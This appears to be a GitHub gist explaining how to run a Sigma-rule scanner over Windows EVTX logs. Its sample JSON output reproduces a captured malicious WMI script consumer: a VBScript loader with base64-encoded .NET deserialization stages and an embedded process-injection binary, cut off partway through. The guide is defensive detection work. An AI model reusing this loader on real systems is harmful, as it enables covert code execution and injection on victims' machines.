Skip to content

Instantly share code, notes, and snippets.

@Neo23x0
Last active January 5, 2023 15:24
Embed
What would you like to do?
Guide to Use Sigma EVTX Checker

Guide to Use Nextron's Sigma EVTX Checker

It's a fast go-based scanner for Linux, Windows, and macOS that applies Sigma rules and outputs the matches as JSON.

Clone the Sigma Repository and cd into it

git clone https://github.com/SigmaHQ/sigma.git
cd sigma

Get the Sigma EVTX Checker

It's part of our EVTX repo in which we collect log exports for the Sigma CI pipeline tests.

The following commands downloads the version for Linux

wget https://github.com/NextronSystems/evtx-baseline/releases/latest/download/evtx-sigma-checker

Use evtx-sigma-checker-darwin for macOS and evtx-sigma-checker-win for the Windows version.

You can find the releases with the latest version for other operating systems here.

Run it on EVTX Files

Run the checker

  • with the log-source config of THOR (that's the config we use in our forensics scanner)
  • and all the Sigma rules in the ./rules/windows directory
  • and scan a directory which contains .evtx files
chmod +x evtx-sigma-checker
./evtx-sigma-checker --log-source ./tools/config/thor.yml --rule-path ./rules/windows/ --evtx-path $PATH_TO_YOUR_EVTX_FILES

Filter the Output

You can use the --rule-level flag to show only rules of a particular minimum level, e.g. --rule-level high. The default shows all matches of rules with level low and higher.

./evtx-sigma-checker --rule-level high --log-source ./tools/config/thor.yml --rule-path ./rules/windows/ --evtx-path $PATH_TO_YOUR_EVTX_FILES

The levels used in Sigma rules are:

  • informational
  • low
  • medium
  • high
  • critical

Beautify the Output

The checker prints the output as JSON into the command line. For better readability in the command line, I recommend piping the output to jq.

  • on Linux: install it with sudo apt-get install jq
  • on macOS: install it with brew install jq
  • on Windows: download it from here
./evtx-sigma-checker --log-source ./tools/config/thor.yml --rule-path ./rules/windows/ --evtx-path $PATH_TO_YOUR_EVTX_FILES | jq .

Output

The output will look like this:

{
  "RulePath": "/Users/neo/code/Workspace/sigma/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml",
  "RuleTitle": "WMI Event Consumer Created Named Pipe",
  "RuleId": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb",
  "RuleLevel": "high",
  "MatchStrings": [
    {
      "SearchIdentifier": "selection",
      "Field": "Image",
      "Offset": 24,
      "Data": "\\scrcons.exe"
    }
  ],
  "Event": "RuleName: -  EventType: CreatePipe  UtcTime: 2021-09-01 11:51:50.206  ProcessGuid: 23F1E02A-693B-612F-AD00-000000006200  ProcessId: 5140  PipeName: \\WkSvcPipeMgr_BRYN78  Image: C:\\Windows\\system32\\wbem\\scrcons.exe  Provider_Name: Microsoft-Windows-Sysmon  Provider_Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9  EventID: 17  Version: 1  Level: 4  Task: 17  Opcode: 0  Keywords: 9223372036854775808  TimeCreated_SystemTime: 1.6304971102138944e+09  EventRecordID: 1889  Execution_ProcessID: 5528  Execution_ThreadID: 2020  Channel: Microsoft-Windows-Sysmon/Operational  Computer: dc01.isengard.local  Security_UserID: S-1-5-18  EventID: 17  ",
  "File": "evtx/sysmon-blacksmith.evtx",
  "Channel": "Microsoft-Windows-Sysmon/Operational"
}
{
  "RulePath": "/Users/neo/code/Workspace/sigma/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml",
  "RuleTitle": "Suspicious Encoded Scripts in a WMI Consumer",
  "RuleId": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b",
  "RuleLevel": "high",
  "MatchStrings": [
    {
      "SearchIdentifier": "selection_destination",
      "Field": "Destination",
      "Offset": 16306,
      "Data": "V3JpdGVQcm9jZXNzTWVtb3J5"
    },
    {
      "SearchIdentifier": "selection_destination",
      "Field": "Destination",
      "Offset": 5552,
      "Data": "RoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2Rl"
    }
  ],
  "Event": "RuleName: -  EventType: WmiConsumerEvent  UtcTime: 2021-09-01 11:51:43.596  Operation: Deleted  User: ISENGARD\\Administrator  Name:  \"ScriptEventConsumer\"  Type: Script  Destination:  \"Function Base64ToStream(b,l)\r\\n  Dim enc, length, transform, ms\r\\n  Set enc = CreateObject(\\\"System.Text.ASCIIEncoding\\\")\r\\n  length = enc.GetByteCount_2(b)\r\\n  Set transform = CreateObject(\\\"System.Security.Cryptography.FromBase64Transform\\\")\r\\n  Set ms = CreateObject(\\\"System.IO.MemoryStream\\\")\r\\n  ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, l\r\\n  ms.Position = 0\r\\n  Set Base64ToStream = ms\r\\nEnd Function\r\\n\r\\nDim shell\r\\nSet shell = CreateObject(\\\"WScript.Shell\\\")\r\\nDim ver\r\\nver = \\\"v4.0.30319\\\"\r\\nOn Error Resume Next\r\\nshell.RegRead \\\"HKLM\\\\SOFTWARE\\\\\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319\\\\\\\"\r\\nIf Err.Number <> 0 Then\r\\n  ver = \\\"v2.0.50727\\\"\r\\n  Err.Clear\r\\nEnd If\r\\nshell.Environment(\\\"Process\\\").Item(\\\"COMPLUS_Version\\\") = ver\r\\n\r\\nOn Error Resume Next\r\\n\r\\nDim stage_1, stage_2\r\\nstage_1 = \\\"AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAxxA8UmVzb3VyY2VEaWN0aW9uYXJ5DQogICAgICAgICAgICB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIg0KICAgICAgICAgICAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogICAgICAgICAgICB4bWxuczpzPSJjbHItbmFtZXNwYWNlOlN5c3RlbTthc3NlbWJseT1tc2NvcmxpYiINCiAgICAgICAgICAgIHhtbG5zOmM9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkNvbmZpZ3VyYXRpb247YXNzZW1ibHk9U3lzdGVtLkNvbmZpZ3VyYXRpb24iDQogICAgICAgICAgICB4bWxuczpyPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5SZWZsZWN0aW9uO2Fzc2VtYmx5PW1zY29ybGliIj4NCiAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJ0eXBlIiBPYmplY3RUeXBlPSJ7eDpUeXBlIHM6VHlwZX0iIE1ldGhvZE5hbWU9IkdldFR5cGUiPg0KICAgICAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgICAgICAgICAgICAgICAgICA8czpTdHJpbmc+U3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLkFwcFNldHRpbmdzLCBTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1PC9zOlN0cmluZz4NCiAgICAgICAgICAgICAgICAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJmaWVsZCIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSB0eXBlfSIgTWV0aG9kTmFtZT0iR2V0RmllbGQiPg0KICAgICAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgICAgICAgICAgICAgICAgICA8czpTdHJpbmc+ZGlzYWJsZUFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3JUeXBlQ2hlY2s8L3M6U3RyaW5nPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHI6QmluZGluZ0ZsYWdzPjQwPC9yOkJpbmRpbmdGbGFncz4NCiAgICAgICAgICAgICAgICAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJzZXQiIE9iamVjdEluc3RhbmNlPSJ7U3RhdGljUmVzb3VyY2UgZmllbGR9IiBNZXRob2ROYW1lPSJTZXRWYWx1ZSI+DQogICAgICAgICAgICAgICAgICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICAgICAgICAgIDxzOk9iamVjdC8+DQogICAgICAgICAgICAgICAgICAgICAgICA8czpCb29sZWFuPnRydWU8L3M6Qm9vbGVhbj4NCiAgICAgICAgICAgICAgICAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgICAgICAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJzZXRNZXRob2QiIE9iamVjdEluc3RhbmNlPSJ7eDpTdGF0aWMgYzpDb25maWd1cmF0aW9uTWFuYWdlci5BcHBTZXR0aW5nc30iIE1ldGhvZE5hbWUgPSJTZXQiPg0KICAgICAgICAgICAgICAgICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgICAgICAgICAgICAgICAgICAgICA8czpTdHJpbmc+bWljcm9zb2Z0OldvcmtmbG93Q29tcG9uZW50TW9kZWw6RGlzYWJsZUFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3JUeXBlQ2hlY2s8L3M6U3RyaW5nPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHM6U3RyaW5nPnRydWU8L3M6U3RyaW5nPg0KICAgICAgICAgICAgICAgICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICAgICAgICAgICAgICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KICAgICAgICAgICAgPC9SZXNvdXJjZURpY3Rpb25hcnk+Cw==\\\"\r\\nstage_2 = \\\"AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMdNAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNv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AYgBUYBZAYgBBgb4AoUBVoA0AYsBVoAlAYsBVoDgAosBVoDsAosBVoDgAYsBVoD4AYsBVoDPAYsBVoA+AYsBVoAKAosBVoCNAYsBVoCbAYsBBgb4AogBVoCXAI8BVoCkAI8BVoC/AY8BVoA0Ao8BVoCtAo8BVoDJAo8BVoCVAo8BVoB6Ao8BVoCyAY8BVoCmAY8BBgDVA4gBBgDhA4gBBgDNA4gBBgCaC4gBBgBGCYgBBgCPC4gBBgA5CYgBBhAAA5MBBgAkBYgBBgCJCogBBgAFAIgBBgAlAIgBBgBHAIgBBgBZAIgBBgCxAIgBBgC1AIgBBgC/BpcBBgC6CYgBBgC0CYgBBgCuCYgBBgCoCYgBBgBxB4gBBgB5B4gBBgAyDIgBBgBCDIgBBgA6DIgBBgAqDIgBBgBzCIgBBgCBCIgBBgCiCYgBBgByCogBBgDXCIgBBgDACYgBBhCrCpMBBgBZB5sBBgAGDJ4BBgDVA6EBBgDhA6EBBgDNA6QBBgAbAKQBBgAFBKEBBgCaC4gBBgBGCaEBBgA9AKEBBgCPC4gBBgA5CaEBBgBPAKEBBgCGCYgBBgCBB4gBBhDKCqcBBhC9CqcBBhCJAJMBBgCEBJsBBgCLBJsBBgCSBJsBBgCZBJsBBgCgBJsBBgCnBJsBBgCJCo8BBgCGCYgBBgCiCaEBBgCoCaEBBgCuCaEBBgC0CaEBBgC6CaEBBgDACaEBBgByCogBBgAFAJsBBgAlAJsBBgBHAJsBBgBZAJsBBgCxAJsBBgC1AJsBBgAuDJsBBgA+DJsBBgBGDJsBBgA2DJsBBgDbCJsBBgB3CJsBBgB9B5sBBgB1B5sBBgC5AJsBBgC8AJsBBgABAJsBBgAJAJsBBgApAJsBBgBLAJsBBgBdAJsBBgCTAJsBBgDLCJsBBgAWAawBBhAkCacBBgD8B5sBBgDvB5sBBgCsCJsBBgCFCJsBBgC8CJsBBgCXCJsBBgBTCKQBBgAZB6QBBgAKCLABBgAeCTgABgDfCDgABgDEBzgABgC/BzgABgBpB4UBBgBxCTgABgA1BLMBAAAAAIAAkSDRBLYBAQAAAAAAgACRIOwETAAJAAAAAACAAJEgSwTDAQsAAAAAAIAAkSCgA84BEAAAAAAAgACRIHAD1gETAAAAAACAAJEg2gvbARQAAAAAAIAAkSDrC9sBFgAAAAAAgACR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Uk9DRVNTX0NSRUFURV9USFJFQUQAUFJPQ0VTU19WTV9SRUFEAERVTU1ZVU5JT05OQU1FAFNVU1BFTkRfUkVTVU1FAFRFUk1JTkFURQBJTVBFUlNPTkFURQBQQUdFX1JFQURXUklURQBQQUdFX0VYRUNVVEVfUkVBRFdSSVRFAFBST0NFU1NfVk1fV1JJVEUATUVNX1JFU0VSVkUAVEhSRUFEX0hJSkFDSwBUSFJFQURfQUxMAENPTlRFWFRfQUxMAENPTlRFWFRfRlVMTABDT05URVhUX0NPTlRST0wAU0VUX1RIUkVBRF9UT0tFTgBTRVRfSU5GT1JNQVRJT04AUFJPQ0VTU19RVUVSWV9JTkZPUk1BVElPTgBESVJFQ1RfSU1QRVJTT05BVElPTgBQUk9DRVNTX1ZNX09QRVJBVElPTgBDT05URVhUX0lOVEVHRVIAU0VDVVJJVFlfREVTQ1JJUFRPUgBTRUNVUklUWV9BVFRSSUJVVEVTAENPTlRFWFRfRkxBR1MAQ09OVEVYVF9FWFRFTkRFRF9SRUdJU1RFUlMAQ09OVEVYVF9ERUJVR19SRUdJU1RFUlMAQ09OVEVYVF9TRUdNRU5UUwBNRU1fQ09NTUlUAENPTlRFWFRfRkxPQVRJTkdfUE9JTlQAR0VUX0NPTlRFWFQAU0VUX0NPTlRFWFQAdmFsdWVfXwBSZWdpc3RlckFyZWEAbXNjb3JsaWIAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMAbHBUaHJlYWRJZABkd1RocmVhZElkAG5OdW1iZXJPZkJ5dGVzVG9SZWFkAGxwTnVtYmVyT2ZCeXRlc1JlYWQAU3VzcGVuZFRocmVhZABSZXN1bWVUaHJlYWQAQ3JlYXRlVGhyZWFkAGhUaHJlYWQAT3BlblRocmVhZABscE92ZXJsYXBwZWQAZGFjbERlZmF1bHRlZABBcHBlbmQAVGFnV29yZABDb250cm9sV29yZABTdGF0dXNXb3JkAHNkAGR3UGlwZU1vZGUAZHdPcGVuTW9kZQBFcnJvck9wY29kZQBUYWtlAEVudW1lcmFibGUAQ2xvc2VIYW5kbGUAaEhhbmRsZQBiSW5oZXJpdEhhbmRsZQBoYW5kbGUAUmVhZEZpbGUAV3JpdGVGaWxlAGhGaWxlAENvbnNvbGUAaE1vZHVsZQBwcm9jTmFtZQBscE5hbWUAUDFIb21lAFAySG9tZQBQM0hvbWUAUDRIb21lAFA1SG9tZQBQNkhvbWUAV3JpdGVMaW5lAGJ5dGVzUGVyTGluZQBnZXRfTmV3TGluZQBDcmVhdGVOYW1lZFBpcGUAaE5hbWVkUGlwZQBDb25uZWN0TmFtZWRQaXBlAFZhbHVlVHlwZQBmbEFsbG9jYXRpb25UeXBlAFN5c3RlbS5Db3JlAENyME5weFN0YXRlAG5OdW1iZXJPZkJ5dGVzVG9Xcml0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRl